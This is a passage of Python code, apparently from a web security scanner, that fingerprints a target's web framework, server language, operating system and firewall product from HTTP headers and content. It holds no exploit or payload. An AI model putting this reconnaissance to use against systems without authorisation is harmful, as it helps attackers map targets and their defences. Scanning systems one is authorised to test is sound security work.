    Returns a tuple with one entry per detector, in the order listed.
    """
    detectors = (
        mvc, cakephp, cherrypy, codeigniter, dancer, django, flask,
        fuelphp, grails, horde, karrigell,
        # NOTE(review): spelled "larvel" here; presumably this matches the
        # plugin's own function name -- confirm before renaming.
        larvel,
        nette, phalcon, play, rails, seagull, spring, symfony, web2py,
        yii, zend,
    )
    return tuple(probe(headers,content) for probe in detectors)


def checkHeaders(headers,content):
    """Hand the response's cookie value and headers to the header checks.

    The first header present among ``cookie`` and ``set-cookie`` is
    selected; its value goes to ``cookies().__run__`` unless it is empty.
    ``header()._run_`` then receives the full header set in every case.
    Both helpers are defined elsewhere (presumably cookie-attribute and
    security-header checks -- confirm in their modules). ``content`` is
    accepted but not used.

    Membership is tested against ``headers.keys()``, so whether the name
    match is case-sensitive depends on the header type that
    ``Request.Send`` returns.
    """
    for name in ('cookie', 'set-cookie'):
        if name in headers.keys():
            if headers[name]:
                cookies().__run__(headers[name])
            # Only the first header that is present is considered, even
            # when its value is empty.
            break
    header()._run_(headers)


def detectLanguage(content):
    """Run every server-side language detector on the response body.

    Returns a tuple with one entry per detector, in the order listed.
    """
    detectors = (asp, aspnet, coldfusion, flash, java, perl, php, python, ruby)
    return tuple(probe(content) for probe in detectors)


def detectOs(headers):
    """Run every operating-system detector on the response headers.

    Returns a tuple with one entry per detector, in the order listed.
    """
    detectors = (bsd, ibm, linux, mac, solaris, unix, windows)
    return tuple(probe(headers) for probe in detectors)


def detectWaf(headers,content):
    """Run every WAF signature detector on one response.

    Returns a tuple with one entry per detector, in the order listed.
    Only this single response is examined, so an empty result is not
    evidence that no WAF sits in front of the target. A non-empty result
    shows which product signature the response exposes.
    """
    detectors = (
        airlock, anquanboa, armor, asm, aws, baidu, barracuda,
        betterwpsecurity, bigip, binarysec, blockdos, ciscoacexml,
        cloudflare, cloudfront, comodo, datapower, denyall, dotdefender,
        edgecast, expressionengine, fortiweb, hyperguard, incapsula,
        isaserver, jiasule, knownsec, kona, modsecurity, netcontinuum,
        netscaler, newdefend, nsfocus, paloalto, profense, radware,
        requestvalidationmode, safe3, safedog, secureiis, senginx,
        sitelock, sonicwall, sophos, stingray, sucuri, teros,
        trafficshield, urlscan, uspses, varnish, wallarm, webknight,
        yundun, yunsuo,
    )
    return tuple(probe(headers,content) for probe in detectors)
# --------------------------------------------------------------------------------